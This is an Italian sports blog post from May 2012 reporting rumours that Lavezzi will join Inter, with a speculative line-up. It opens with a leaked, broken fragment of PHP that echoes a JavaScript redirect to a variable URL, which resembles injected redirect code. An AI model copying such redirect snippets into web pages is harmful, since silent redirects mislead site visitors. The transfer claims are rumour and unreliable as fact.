location.href='". $red ."';"; exit(); } ?> Notizie 24 News: Calciomercato Inter: Lavezzi, strada in discesa, è un Moratti scatenato…

Ads 468x60px

Random Post

Template Updates

mercoledì 23 maggio 2012

Calciomercato Inter: Lavezzi, strada in discesa, è un Moratti scatenato…

Lavezzi presto dovrebbe diventare un giocatore nerazzurro. Un Moratti scatenato è ora vicino al secondo colpo di calciomercato grazie al quale regala all’Inter di Stramaccioni un tridente tutto argentino

Lavezzi e Inter, accordo nell'aria?Sarà sempre più argentina la nuova Inter di Stramaccioni. Il presidente Moratti è letteralmente scatenato sul calciomercato e dopo l’acquisto di Rodrigo Palacio dal Genoa, ufficializzato dallo stesso Preziosi, dovrebbe presto chiudere un altro colpo da novanta, prelevando Ezequiel Lavezzi dal Napoli. Nei prossimi giorni la trattativa dovrebbe sbloccarsi in maniera definitiva, con il Pocho che ha già salutato in lacrime i suoi ex compagni, pronto alla nuova avventura nella Milano nerazzurra. L’ex attaccante partenopeo, avrebbe rifiutato la serrata corte del PSG di Carlo Ancelotti, disposto a ricoprirlo d’oro con un contratto milionario e coinvolgerlo in un progetto molto ambizioso, per rimanere nella Serie A e lottare finalmente per traguardi importanti.
I primi giorni di calciomercato hanno già regalato all’Inter un ottimo elemento nel reparto avanzato mentre il secondo sembra ormai in dirittura d’arrivo, il nuovo attacco nerazzurro sarà tutto argentino. I nuovi arrivati Lavezzi e Palacio, elementi di grande tecnica e velocità, giocheranno alle spalle del bomber Diego Milito, pronto a finalizzare le occasioni create dai due partner d’attacco. La colonia argentina dunque ancora la farà da padrona nello spogliatoio nerazzurro e forse in questo modo il compito di Stramaccioni, che ha comunque ampiamente dimostrato di saper gestire certe situazioni, ne trarrà qualche agevolazione.
Inizia a prendere finalmente forma la squadra nerazzurra che sistemato l’attacco, procederà ora a rinforzare anche difesa e centrocampo. Per il ruolo di terzino sinistro piace molto Kolarov del Manchester City, mentre si segue con insistenza Silvestre del Palermo come centrale da affiancare a Walter Samuel. Per la linea mediana pronti tre nuovi nomi: Isla, De Jong e Lucas. Ecco allora come potrebbe scendere in campo la formazione di mister Stramaccioni, schierata con uno spregiudicato 4-3-3: INTER – Julio Cesar, Maicon, SILVESTRE, Samuel, KOLAROV; Guarin, Zanetti, LUCAS; LAVEZZI, PALACIO, Milito

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text